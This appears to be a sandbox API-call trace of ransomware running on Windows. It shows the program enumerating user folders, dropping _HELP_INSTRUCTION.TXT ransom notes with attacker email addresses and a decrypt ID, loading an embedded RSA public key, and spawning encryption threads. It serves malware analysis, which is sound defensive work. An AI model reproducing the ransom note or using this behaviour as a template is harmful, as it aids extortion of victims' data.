[0203.001] SetErrorMode (uMode=0x1) returned 0x1 [0203.001] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Documents\\My Videos" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos") returned="C:\\Users\\Default\\Documents\\My Videos" [0203.001] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Videos", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos\\") returned="C:\\Users\\Default\\Documents\\My Videos\\" [0203.002] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Documents\\My Videos\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos\\") returned="C:\\Users\\Default\\Documents\\My Videos\\" [0203.002] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Videos\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos\\*.*") returned="C:\\Users\\Default\\Documents\\My Videos\\*.*" [0203.002] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Videos\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0203.002] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0203.002] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Documents\\My Videos" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos") returned="C:\\Users\\Default\\Documents\\My Videos" [0203.002] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Videos", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos\\*.*") returned="C:\\Users\\Default\\Documents\\My Videos\\*.*" [0203.002] SetErrorMode (uMode=0x1) returned 0x1 [0203.002] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Documents\\My Videos\\_HELP_INSTRUCTION.TXT") returned 58 [0203.002] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0203.002] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0203.002] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xe3c) returned 0x0 [0203.002] RegQueryValueExW (in: hKey=0xe3c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43ba530, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43ba530*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0203.002] RegCloseKey (hKey=0xe3c) returned 0x0 [0203.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0203.002] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0203.003] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Videos\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\documents\\my videos\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0203.003] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Videos\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\documents\\my videos\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0203.003] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Videos\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0203.003] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0203.003] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0203.003] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0203.004] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0203.004] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0203.004] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0203.004] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0203.004] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0203.004] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0203.004] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Downloads" | out: lpString1="C:\\Users\\Default\\Downloads") returned="C:\\Users\\Default\\Downloads" [0203.004] SetErrorMode (uMode=0x1) returned 0x1 [0203.004] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Downloads" | out: lpString1="C:\\Users\\Default\\Downloads") returned="C:\\Users\\Default\\Downloads" [0203.004] lstrcatW (in: lpString1="C:\\Users\\Default\\Downloads", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Downloads\\") returned="C:\\Users\\Default\\Downloads\\" [0203.004] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Downloads\\" | out: lpString1="C:\\Users\\Default\\Downloads\\") returned="C:\\Users\\Default\\Downloads\\" [0203.004] lstrcatW (in: lpString1="C:\\Users\\Default\\Downloads\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Downloads\\*.*") returned="C:\\Users\\Default\\Downloads\\*.*" [0203.004] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Downloads\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0203.004] PathFindFileNameW (pszPath="C:\\Users\\Default\\Downloads") returned="Downloads" [0203.004] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Downloads" | out: lpString1="Downloads") returned="Downloads" [0203.004] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0203.005] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0203.005] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0203.005] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0203.005] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0203.005] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Downloads\\") returned 31 [0203.005] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Downloads\\") [0203.005] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0203.005] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0203.005] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Downloads\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Downloads\\") returned="\\\\?\\C:\\Users\\Default\\Downloads\\" [0203.005] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe40 [0203.005] Sleep (dwMilliseconds=0x96) [0203.148] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0203.149] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0203.149] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0203.149] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Downloads" | out: lpString1="C:\\Users\\Default\\Downloads") returned="C:\\Users\\Default\\Downloads" [0203.149] lstrcatW (in: lpString1="C:\\Users\\Default\\Downloads", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Downloads\\*.*") returned="C:\\Users\\Default\\Downloads\\*.*" [0203.149] SetErrorMode (uMode=0x1) returned 0x1 [0203.149] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Downloads\\_HELP_INSTRUCTION.TXT") returned 48 [0203.149] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0203.150] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0203.150] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xe44) returned 0x0 [0203.150] RegQueryValueExW (in: hKey=0xe44, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43ba760, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43ba760*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0203.150] RegCloseKey (hKey=0xe44) returned 0x0 [0203.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0203.150] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0203.150] CreateFileW (lpFileName="C:\\Users\\Default\\Downloads\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\downloads\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0203.150] CreateFileW (lpFileName="C:\\Users\\Default\\Downloads\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\downloads\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0203.150] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Downloads\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0203.151] PathFindFileNameW (pszPath="C:\\Users\\Default\\Downloads") returned="Downloads" [0203.151] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Downloads" | out: lpString1="Downloads") returned="Downloads" [0203.151] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0203.151] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0203.151] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Favorites" | out: lpString1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0203.151] SetErrorMode (uMode=0x1) returned 0x1 [0203.151] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Favorites" | out: lpString1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0203.151] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\") returned="C:\\Users\\Default\\Favorites\\" [0203.151] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Favorites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\") returned="C:\\Users\\Default\\Favorites\\" [0203.151] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\*.*") returned="C:\\Users\\Default\\Favorites\\*.*" [0203.151] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0203.151] PathFindFileNameW (pszPath="C:\\Users\\Default\\Favorites") returned="Favorites" [0203.151] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Favorites" | out: lpString1="Favorites") returned="Favorites" [0203.152] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0203.152] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0203.152] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0203.152] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0203.152] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0203.152] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\") returned 31 [0203.152] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Favorites\\") [0203.152] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0203.152] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0203.152] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\" [0203.152] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe4c [0203.153] Sleep (dwMilliseconds=0x96) [0203.304] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0203.304] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0203.305] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0203.305] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0203.305] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0203.305] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0203.305] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0203.305] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Favorites" | out: lpString1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0203.305] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\*.*") returned="C:\\Users\\Default\\Favorites\\*.*" [0203.305] SetErrorMode (uMode=0x1) returned 0x1 [0203.305] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Favorites\\_HELP_INSTRUCTION.TXT") returned 48 [0203.305] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0203.305] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0203.305] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xe50) returned 0x0 [0203.306] RegQueryValueExW (in: hKey=0xe50, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43ba990, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43ba990*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0203.306] RegCloseKey (hKey=0xe50) returned 0x0 [0203.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0203.306] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0203.306] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\favorites\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0203.306] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\favorites\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0203.306] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0203.306] PathFindFileNameW (pszPath="C:\\Users\\Default\\Favorites") returned="Favorites" [0203.306] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Favorites" | out: lpString1="Favorites") returned="Favorites" [0203.306] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Default\\Favorites" | out: lpString1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0203.306] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\") returned="C:\\Users\\Default\\Favorites\\" [0203.306] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="Links" | out: lpString1="C:\\Users\\Default\\Favorites\\Links") returned="C:\\Users\\Default\\Favorites\\Links" [0203.307] SetErrorMode (uMode=0x1) returned 0x1 [0203.307] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Favorites\\Links" | out: lpString1="C:\\Users\\Default\\Favorites\\Links") returned="C:\\Users\\Default\\Favorites\\Links" [0203.307] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Links", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Links\\") returned="C:\\Users\\Default\\Favorites\\Links\\" [0203.307] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Favorites\\Links\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Links\\") returned="C:\\Users\\Default\\Favorites\\Links\\" [0203.307] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Links\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\Links\\*.*") returned="C:\\Users\\Default\\Favorites\\Links\\*.*" [0203.307] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Links\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0203.307] PathFindFileNameW (pszPath="C:\\Users\\Default\\Favorites\\Links") returned="Links" [0203.307] lstrcpyW (in: lpString1=0x17b644, lpString2="Links" | out: lpString1="Links") returned="Links" [0203.307] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0203.307] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0203.307] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0203.307] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0203.307] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0203.307] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\") returned 37 [0203.307] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\") [0203.308] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0203.308] lstrcpyW (in: lpString1=0x17be7c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0203.308] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\" [0203.308] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe58 [0203.308] Sleep (dwMilliseconds=0x96) [0203.461] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0203.461] lstrcmpW (lpString1="Web Slice Gallery.url", lpString2="..") returned 1 [0203.461] lstrcmpW (lpString1="Web Slice Gallery.url", lpString2=".") returned 1 [0203.461] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0203.461] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch="ntldr") returned 0x0 [0203.461] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch="NTLDR") returned 0x0 